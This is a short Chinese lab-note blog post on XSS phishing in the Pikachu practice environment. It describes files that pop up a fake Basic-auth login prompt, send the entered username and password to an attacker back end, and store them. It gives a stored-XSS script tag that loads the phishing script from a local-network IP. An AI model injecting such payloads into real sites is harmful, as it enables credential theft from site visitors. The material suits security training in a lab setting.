XSS跨站脚本攻击之——XSS钓鱼测试

XSS钓鱼测试

钓鱼攻击利用页面

 D:\phpStudy\WWW\pikachu\pkxss\xfish
	使用存储型xss实验

目录下文件解读

			fish.php
				容错
					用户密码为空的话
						定义html类型,编码类型
						”basic“认证,弹出对话框,要求输入账号密码
						http协议1.0 当不输账号密码,出现401错误
						返回 错误
					用户密码不为空
						如果用户名密码不为空,将结果发送给攻击者后台,这里的IP地址为管理后台的IP
							将用户名密码用location跳转到xfish.php页面
			pkxss_fish_result.php
				攻击者后台
			xfish.php
				判断用户名密码是否为空,把对话框输入的用户名和密码发送到数据库
<script src="http://192.168.0.101/pikachu/pkxss/xfish/fish.php"></script>
	网站为构造好的钓鱼页面

方法

将你制作好的钓鱼页面在输入框直接输入之后,当用户访问页面时候,弹出一些有迷惑性的文本框,填写之后,就可以得到信息了
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值